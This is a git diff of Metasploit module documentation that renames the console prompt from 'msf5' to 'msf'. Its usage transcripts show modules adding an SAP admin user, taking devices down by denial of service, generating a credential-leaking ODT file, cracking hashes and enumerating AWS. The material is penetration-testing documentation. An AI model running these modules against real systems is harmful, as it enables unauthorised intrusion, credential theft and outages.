root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/juniper_ex root@metasploit-dev:~/metasploit-framework# ./msfconsole [*] Starting persistent handler(s)... -msf5 > use auxiliary/admin/networking/gather/juniper_config -msf5 auxiliary(admin/networking/gather/juniper_config) > set config /tmp/juniper_ex2200.config +msf > use auxiliary/admin/networking/gather/juniper_config +msf auxiliary(admin/networking/gather/juniper_config) > set config /tmp/juniper_ex2200.config config => /tmp/juniper_ex2200.config -msf5 auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 +msf auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(admin/networking/gather/juniper_config) > run +msf auxiliary(admin/networking/gather/juniper_config) > run [*] Running module against 127.0.0.1 [*] Importing config 
@@ -1069,14 +1069,14 @@ root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/screenos.c root@metasploit-dev:~/metasploit-framework# ./msfconsole [*] Starting persistent handler(s)... -msf5 > use auxiliary/admin/networking/gather/juniper_config -msf5 auxiliary(admin/networking/gather/juniper_config) > set config /tmp/screenos.conf +msf > use auxiliary/admin/networking/gather/juniper_config +msf auxiliary(admin/networking/gather/juniper_config) > set config /tmp/screenos.conf config => /tmp/screenos.conf -msf5 auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 +msf auxiliary(admin/networking/gather/juniper_config) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(admin/networking/gather/juniper_config) > set action SCREENOS +msf auxiliary(admin/networking/gather/juniper_config) > set action SCREENOS action => SCREENOS -msf5 auxiliary(admin/networking/gather/juniper_config) > run +msf auxiliary(admin/networking/gather/juniper_config) > run [*] Running module against 127.0.0.1 [*] Importing config diff --git a/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md b/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md index 623ff64a1f..1a783aaf74 100644 --- a/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md +++ b/documentation/modules/auxiliary/admin/networking/ubiquiti_config.md @@ -64,9 +64,9 @@ resource (unifi_config.rb)> run resource (unifi_config.rb)> use auxiliary/admin/networking/ubiquiti_config resource (unifi_config.rb)> set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(admin/networking/ubiquiti_config) > set config /root/.msf4/loot/db +msf auxiliary(admin/networking/ubiquiti_config) > set config /root/.msf4/loot/db config => /root/.msf4/loot/db -msf5 auxiliary(admin/networking/ubiquiti_config) > run +msf auxiliary(admin/networking/ubiquiti_config) > run [*] Running module against 127.0.0.1 [*] Converting config BSON to JSON 
diff --git a/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md b/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md index 3900f4f3a7..0f095c802c 100644 --- a/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md +++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.md @@ -40,18 +40,18 @@ From the documentation: Example: Adding a new user `metasploit` with the `Administrator` role: ``` -msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan +msf > use auxiliary/admin/sap/cve_2020_6287_ws_add_user +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan RHOSTS => netweaver.lan -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit USERNAME => metasploit -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 PASSWORD => 0pe3nS3sam3 -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > check +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > check [+] 192.168.53.183:50000 - The target is vulnerable. -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set VERBOSE true VERBOSE => true -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run [*] Running module against 192.168.53.183 [*] Starting the PCK Upgrade job... 
@@ -63,27 +63,27 @@ msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run [+] Successfully added the role to the new user [*] Canceling the PCK Upgrade job... [*] Auxiliary module execution completed -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > ``` Example: Removing the user `metasploit`: ``` -msf5 > use auxiliary/admin/sap/cve_2020_6287_ws_add_user -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan +msf > use auxiliary/admin/sap/cve_2020_6287_ws_add_user +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set RHOSTS netweaver.lan RHOSTS => netweaver.lan -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set USERNAME metasploit USERNAME => metasploit -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set PASSWORD 0pe3nS3sam3 PASSWORD => 0pe3nS3sam3 -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set ACTION REMOVE +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > set ACTION REMOVE ACTION => REMOVE -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > run [*] Running module against 192.168.53.183 [+] Successfully deleted the user account [*] Auxiliary module execution completed -msf5 auxiliary(admin/sap/cve_2020_6287_ws_add_user) > +msf auxiliary(admin/sap/cve_2020_6287_ws_add_user) > ``` [1]: https://aws.amazon.com/marketplace/seller-profile?id=56cbce49-5486-4a83-a6b7-0fea3841da1b diff --git a/documentation/modules/auxiliary/admin/scada/pcom_command.md b/documentation/modules/auxiliary/admin/scada/pcom_command.md index e239c1f765..829a74c781 100755 --- a/documentation/modules/auxiliary/admin/scada/pcom_command.md +++ b/documentation/modules/auxiliary/admin/scada/pcom_command.md 
@@ -11,8 +11,8 @@ ## Scenarios ``` -msf5 > use auxiliary/admin/scada/pcom_command -msf5 auxiliary(admin/scada/pcom_command) > show options +msf > use auxiliary/admin/scada/pcom_command +msf auxiliary(admin/scada/pcom_command) > show options Module options (auxiliary/admin/scada/pcom_command): @@ -23,12 +23,12 @@ Module options (auxiliary/admin/scada/pcom_command): RPORT 20256 yes The target port (TCP) UNITID 0 no Unit ID (0 - 127) -msf5 auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1 +msf auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 -msf5 auxiliary(admin/scada/pcom_command) > run +msf auxiliary(admin/scada/pcom_command) > run [*] 192.168.1.1:20256 - Sending RESET command [*] 192.168.1.1:20256 - Command accepted [*] Auxiliary module execution completed -msf5 auxiliary(admin/scada/pcom_command) > +msf auxiliary(admin/scada/pcom_command) > ``` diff --git a/documentation/modules/auxiliary/admin/smb/webexec_command.md b/documentation/modules/auxiliary/admin/smb/webexec_command.md index 8ccd18499a..d0c65fe35e 100644 --- a/documentation/modules/auxiliary/admin/smb/webexec_command.md +++ b/documentation/modules/auxiliary/admin/smb/webexec_command.md 
@@ -29,17 +29,17 @@ ### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86 ``` - msf5 > use auxiliary/admin/smb/webexec_command - msf5 auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136 + msf > use auxiliary/admin/smb/webexec_command + msf auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136 rhosts => 192.168.37.136 - msf5 auxiliary(admin/smb/webexec_command) > set smbuser a_user + msf auxiliary(admin/smb/webexec_command) > set smbuser a_user smbuser => a_user - msf5 auxiliary(admin/smb/webexec_command) > set smbpass password + msf auxiliary(admin/smb/webexec_command) > set smbpass password smbpass => password - msf5 auxiliary(admin/smb/webexec_command) > run + msf auxiliary(admin/smb/webexec_command) > run [+] 192.168.37.136:445 - Command completed! [*] 192.168.37.136:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(admin/smb/webexec_command) > + msf auxiliary(admin/smb/webexec_command) > ``` diff --git a/documentation/modules/auxiliary/admin/wemo/crockpot.md b/documentation/modules/auxiliary/admin/wemo/crockpot.md index a4115725c1..f698a8f390 100644 --- a/documentation/modules/auxiliary/admin/wemo/crockpot.md +++ b/documentation/modules/auxiliary/admin/wemo/crockpot.md 
@@ -38,22 +38,22 @@ functionality. Set this only if you're SURE you want to proceed. ## Usage ``` -msf5 > use auxiliary/admin/wemo/crockpot -msf5 auxiliary(admin/wemo/crockpot) > set rhosts 10.22.22.1 +msf > use auxiliary/admin/wemo/crockpot +msf auxiliary(admin/wemo/crockpot) > set rhosts 10.22.22.1 rhosts => 10.22.22.1 -msf5 auxiliary(admin/wemo/crockpot) > set temp High +msf auxiliary(admin/wemo/crockpot) > set temp High temp => High -msf5 auxiliary(admin/wemo/crockpot) > set time 1 +msf auxiliary(admin/wemo/crockpot) > set time 1 time => 1 -msf5 auxiliary(admin/wemo/crockpot) > set defangedmode false +msf auxiliary(admin/wemo/crockpot) > set defangedmode false defangedmode => false -msf5 auxiliary(admin/wemo/crockpot) > set verbose true +msf auxiliary(admin/wemo/crockpot) > set verbose true verbose => true -msf5 auxiliary(admin/wemo/crockpot) > run +msf auxiliary(admin/wemo/crockpot) > run [+] Wemo-enabled Crock-Pot detected [*] Cooking on High for 1m [+] Cook time set to 1m [*] Auxiliary module execution completed -msf5 auxiliary(admin/wemo/crockpot) > +msf auxiliary(admin/wemo/crockpot) > ``` diff --git a/documentation/modules/auxiliary/analyze/crack_mobile.md b/documentation/modules/auxiliary/analyze/crack_mobile.md index fb48f790ae..bd3bc3c23f 100644 --- a/documentation/modules/auxiliary/analyze/crack_mobile.md +++ b/documentation/modules/auxiliary/analyze/crack_mobile.md 
@@ -151,11 +151,11 @@ creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging. ``` -msf5 post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1 -msf5 post(android/gather/hashdump) > previous -msf5 auxiliary(analyze/crack_mobile) > set showcommand true +msf post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1 +msf post(android/gather/hashdump) > previous +msf auxiliary(analyze/crack_mobile) > set showcommand true showcommand => true -msf5 auxiliary(analyze/crack_mobile) > run +msf auxiliary(analyze/crack_mobile) > run [+] hashcat Version Detected: v5.1.0 [*] Hashes Written out to /tmp/hashes_tmp20191112-9775-19hbg7j @@ -189,14 +189,14 @@ nvmlDeviceGetFanSpeed(): Not Supported Create a password with each type, passwords are all `1234`. ``` -msf5 > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1 -msf5 > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1 -msf5 > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5 +msf > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1 +msf > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1 +msf > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5 ``` ``` -msf5 > use auxiliary/analyze/crack_mobile -msf5 auxiliary(analyze/crack_mobile) > run +msf > use auxiliary/analyze/crack_mobile +msf auxiliary(analyze/crack_mobile) > run [+] hashcat Version Detected: v5.1.0 [*] Hashes Written out to /tmp/hashes_tmp20191113-29506-1xydi7 
diff --git a/documentation/modules/auxiliary/cloud/aws/enum_ec2.md b/documentation/modules/auxiliary/cloud/aws/enum_ec2.md index 414ba5c3eb..8936aa08d0 100644 --- a/documentation/modules/auxiliary/cloud/aws/enum_ec2.md +++ b/documentation/modules/auxiliary/cloud/aws/enum_ec2.md @@ -41,7 +41,7 @@ This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute ### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_iam) > run +msf auxiliary(cloud/aws/enum_iam) > run [+] Found 3 users. [+] User Name: test1 @@ -89,29 +89,29 @@ msf5 auxiliary(cloud/aws/enum_iam) > run ### Provided an invalid or inactive 'access key ID' ``` -msf5 auxiliary(cloud/aws/enum_iam) > run +msf auxiliary(cloud/aws/enum_iam) > run [-] Auxiliary aborted due to failure: unexpected-reply: The security token included in the request is invalid. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_iam) > +msf auxiliary(cloud/aws/enum_iam) > ``` ### Provided an invalid 'secret access key' ``` -msf5 auxiliary(cloud/aws/enum_iam) > run +msf auxiliary(cloud/aws/enum_iam) > run [-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your AWS Secret Access Key and signing method. Consult the service documentation for details. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_iam) > +msf auxiliary(cloud/aws/enum_iam) > ``` ### Provided an 'access key ID' or 'secret access key' with insufficient privileges ``` -msf5 auxiliary(cloud\aws\enum_ec2) > run +msf auxiliary(cloud\aws\enum_ec2) > run [-] Auxiliary aborted due to failure: unexpected-reply: User: arn:aws:iam::899712345657:user/test1 is not authorized to perform: iam:ListUsers on resource: arn:aws:iam::899712345657:user/ [*] Auxiliary module execution completed -msf5 auxiliary(cloud\aws\enum_ec2) > +msf auxiliary(cloud\aws\enum_ec2) > ``` 
diff --git a/documentation/modules/auxiliary/cloud/aws/enum_iam.md b/documentation/modules/auxiliary/cloud/aws/enum_iam.md index 776adb7e2a..e9ad8068a4 100644 --- a/documentation/modules/auxiliary/cloud/aws/enum_iam.md +++ b/documentation/modules/auxiliary/cloud/aws/enum_iam.md @@ -54,7 +54,7 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a ### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_ec2) > run +msf auxiliary(cloud/aws/enum_ec2) > run [*] Found 0 instances in eu-north-1 [*] Found 0 instances in ap-south-1 @@ -78,25 +78,25 @@ msf5 auxiliary(cloud/aws/enum_ec2) > run [+] Private IP: 18.236.87.255 (ip-172-31-30-21.us-west-2.compute.internal) [+] Security Group: sg-0d52cc35aaf82aff5 [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_ec2) > +msf auxiliary(cloud/aws/enum_ec2) > ``` ### Provided an invalid or inactive 'access key ID', or an invalid 'secret access key' ``` -msf5 auxiliary(cloud\aws\enum_ec2) > run +msf auxiliary(cloud\aws\enum_ec2) > run [-] Auxiliary aborted due to failure: unexpected-reply: AWS was not able to validate the provided access credentials [*] Auxiliary module execution completed -msf5 auxiliary(cloud\aws\enum_ec2) > +msf auxiliary(cloud\aws\enum_ec2) > ``` ### Provided an 'access key ID' or 'secret access key' with insufficient privileges ``` -msf5 auxiliary(cloud\aws\enum_ec2) > run +msf auxiliary(cloud\aws\enum_ec2) > run [-] Auxiliary aborted due to failure: unexpected-reply: You are not authorized to perform this operation. [*] Auxiliary module execution completed -msf5 auxiliary(cloud\aws\enum_ec2) > +msf auxiliary(cloud\aws\enum_ec2) > ``` diff --git a/documentation/modules/auxiliary/cloud/aws/enum_s3.md b/documentation/modules/auxiliary/cloud/aws/enum_s3.md index c38d9a381f..0fcba2ef75 100644 --- a/documentation/modules/auxiliary/cloud/aws/enum_s3.md 
+++ b/documentation/modules/auxiliary/cloud/aws/enum_s3.md @@ -47,7 +47,7 @@ This module authenticates to AWS S3 (Simple Storage Service), to identify bucket ### Provided a valid 'access key ID' and 'secret access key' with sufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [+] Found 1 buckets. [+] Name: asoto-secret-demo-bucket [+] Creation Date: 2019-06-13 23:30:26 UTC @@ -61,35 +61,35 @@ msf5 auxiliary(cloud/aws/enum_s3) > run [*] [*] Done. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > exit +msf auxiliary(cloud/aws/enum_s3) > exit ``` ### Provided an invalid or inactive 'access key ID' ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [-] Auxiliary aborted due to failure: unexpected-reply: The AWS Access Key Id you provided does not exist in our records. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > +msf auxiliary(cloud/aws/enum_s3) > ``` ### Provided an invalid 'secret access key' ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [-] Auxiliary aborted due to failure: unexpected-reply: The request signature we calculated does not match the signature you provided. Check your key and signing method. [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > +msf auxiliary(cloud/aws/enum_s3) > ``` ### Provided an 'access key ID' or 'secret access key' with insufficient privileges ``` -msf5 auxiliary(cloud/aws/enum_s3) > run +msf auxiliary(cloud/aws/enum_s3) > run [-] Auxiliary aborted due to failure: unexpected-reply: Access Denied [*] Auxiliary module execution completed -msf5 auxiliary(cloud/aws/enum_s3) > +msf auxiliary(cloud/aws/enum_s3) > ``` diff --git a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md index 5dfbac0edc..a4413cc268 100644 
--- a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md +++ b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md @@ -18,10 +18,10 @@ The device will "re-spring" the operating system, but not actually restart the d ### Safari 602.1 on iOS 10.1.1 ``` -msf5 > use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur -msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > set URIPATH / +msf > use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur +msf auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > set URIPATH / URIPATH => / -msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > run +msf auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > run [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.0.1:8080/ diff --git a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md index e684133f89..38964cb0b4 100644 --- a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md +++ b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos.md @@ -29,10 +29,10 @@ #### Successful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3) 
@@ -54,10 +54,10 @@ msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run #### Unsuccessful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled. @@ -68,10 +68,10 @@ msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run #### Successful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3) @@ -93,10 +93,10 @@ msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run #### Unsuccessful Scenario: ``` -msf5 > use auxiliary/dos/cisco/cisco_7937G_dos -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937G_dos +msf auxiliary(dos/cisco/cisco_7937G_dos) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937G_dos) > run +msf auxiliary(dos/cisco/cisco_7937G_dos) > run [*] Starting server... [-] 192.168.110.209 - Device doesn't appear to be functioning (already dos'd?) or SSH is not enabled. diff --git a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md index d6731f4ed4..9e563aab63 100644 --- a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md 
+++ b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md @@ -28,10 +28,10 @@ ### Cisco 7937G Running Firmware Version SCCP-1-4-5-7 ``` -msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937g_dos_reboot +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run [*] Starting server... [*] 192.168.110.209 - Sending DoS Packets. Stand by. @@ -42,10 +42,10 @@ msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run ### Cisco 7937G Running Firmware Version SCCP-1-4-5-5 ``` -msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 +msf > use auxiliary/dos/cisco/cisco_7937g_dos_reboot +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run +msf auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run [*] Starting server... [*] 192.168.110.209 - Sending DoS Packets. Stand by. diff --git a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md index 3e166c0db5..6dbc7c6714 100644 --- a/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md +++ b/documentation/modules/auxiliary/dos/http/cable_haunt_websocket_dos.md @@ -31,7 +31,7 @@ On some devices the Spectrum Analysis web service runs on port `8080`, though Ly ## Scenarios ``` -msf5 auxiliary(dos/http/cable_haunt_websocket_dos) > run +msf auxiliary(dos/http/cable_haunt_websocket_dos) > run [*] Running module against 192.168.100.1 [*] Attempting Connection to 192.168.100.1 
diff --git a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md index f960f2fcd6..1547dc1b2c 100644 --- a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md +++ b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md @@ -55,12 +55,12 @@ Check the box saying: ```Enable web server on port:...``` ### WINDOWS 7/10 ``` -msf5 > use auxiliary/dos/http/flexense_http_server_dos -msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27 +msf > use auxiliary/dos/http/flexense_http_server_dos +msf auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27 rhost => 192.168.1.27 -msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80 +msf auxiliary(dos/http/flexense_http_server_dos) > set rport 80 rport => 80 -msf5 auxiliary(dos/http/flexense_http_server_dos) > run +msf auxiliary(dos/http/flexense_http_server_dos) > run [*] 192.168.1.20:80 - Triggering the vulnerability [+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! diff --git a/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md index 8f44caf777..b976d8e67d 100644 --- a/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md +++ b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md @@ -26,7 +26,7 @@ ## Scenarios ``` -msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run +msf auxiliary(dos/http/metasploit_httphandler_dos) > run [*] Running module against 127.0.0.1 [*] 127.0.0.1:8080 - Sending DoS packet... diff --git a/documentation/modules/auxiliary/dos/tcp/claymore.md b/documentation/modules/auxiliary/dos/tcp/claymore.md index 001513efdd..db0eed44f3 100644 --- a/documentation/modules/auxiliary/dos/tcp/claymore.md +++ b/documentation/modules/auxiliary/dos/tcp/claymore.md 
@@ -16,8 +16,8 @@ Claymore Dual GPU Miner<=10.5 ### Claymore Dual GPU Miner/10.0 - window7 ``` -msf5 > use auxiliary/dos/tcp/claymore_dos -msf5 auxiliary(dos/tcp/claymore_dos) > show options +msf > use auxiliary/dos/tcp/claymore_dos +msf auxiliary(dos/tcp/claymore_dos) > show options Module options (auxiliary/dos/tcp/claymore_dos): @@ -26,9 +26,9 @@ Module options (auxiliary/dos/tcp/claymore_dos): rhost yes The target address rport 3333 yes The target port -msf5 auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1 +msf auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(dos/tcp/claymore_dos) > run +msf auxiliary(dos/tcp/claymore_dos) > run [*] Starting server... [*] Creating sockets... diff --git a/documentation/modules/auxiliary/fileformat/odt_badodt.md b/documentation/modules/auxiliary/fileformat/odt_badodt.md index e2b66dc06f..8d8945da5a 100644 --- a/documentation/modules/auxiliary/fileformat/odt_badodt.md +++ b/documentation/modules/auxiliary/fileformat/odt_badodt.md @@ -47,14 +47,14 @@ set LISTENER 192.168.1.25 Install LibreOffice 6.03 or Apache OpenOffice 4.1.5 on a Windows workstation. (Note: This attack does not work against Mac or Linux versions.) ``` - msf5 > use auxiliary/fileformat/odt_badodt - msf5 auxiliary(fileformat/odt_badodt) > set FILENAME salary.odt + msf > use auxiliary/fileformat/odt_badodt + msf auxiliary(fileformat/odt_badodt) > set FILENAME salary.odt FILENAME => salary.odt - msf5 auxiliary(fileformat/odt_badodt) > set LHOST 192.168.1.25 + msf auxiliary(fileformat/odt_badodt) > set LHOST 192.168.1.25 LHOST => 192.168.1.25 - msf5 auxiliary(fileformat/odt_badodt) > set CREATOR A_USER + msf auxiliary(fileformat/odt_badodt) > set CREATOR A_USER CREATOR => A_USER - msf5 auxiliary(fileformat/odt_badodt) > exploit + msf auxiliary(fileformat/odt_badodt) > exploit [*] Generating Malicious ODT File [*] SMB Listener Address will be set to 192.168.1.25 
@@ -67,13 +67,13 @@ On an attacker workstation, use a tool to serve and capture an SMB share on port ``` $ sudo ./msfconsole - msf5 > use auxiliary/server/capture/smb - msf5 auxiliary(server/capture/smb) > run + msf > use auxiliary/server/capture/smb + msf auxiliary(server/capture/smb) > run [*] Auxiliary module running as background job 0. - msf5 auxiliary(server/capture/smb) > + msf auxiliary(server/capture/smb) > [*] Server started. - msf5 auxiliary(server/capture/smb) > + msf auxiliary(server/capture/smb) > ``` Leave the metasploit SMB server listening while the user opens the document. Upon opening the ODT file, the user workstation will attempt to connect (and authenticate) to the attacker workstation: diff --git a/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md b/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md index 7b4fd5396e..b6cc0c5514 100644 --- a/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md +++ b/documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md @@ -65,7 +65,7 @@ if ($Q::page == 2) { [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed [*] Starting persistent handler(s)... - msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds + msf auxiliary(gather/c2s_dvr_password_disclosure) > creds Credentials =========== diff --git a/documentation/modules/auxiliary/gather/cisco_rv320_config.md 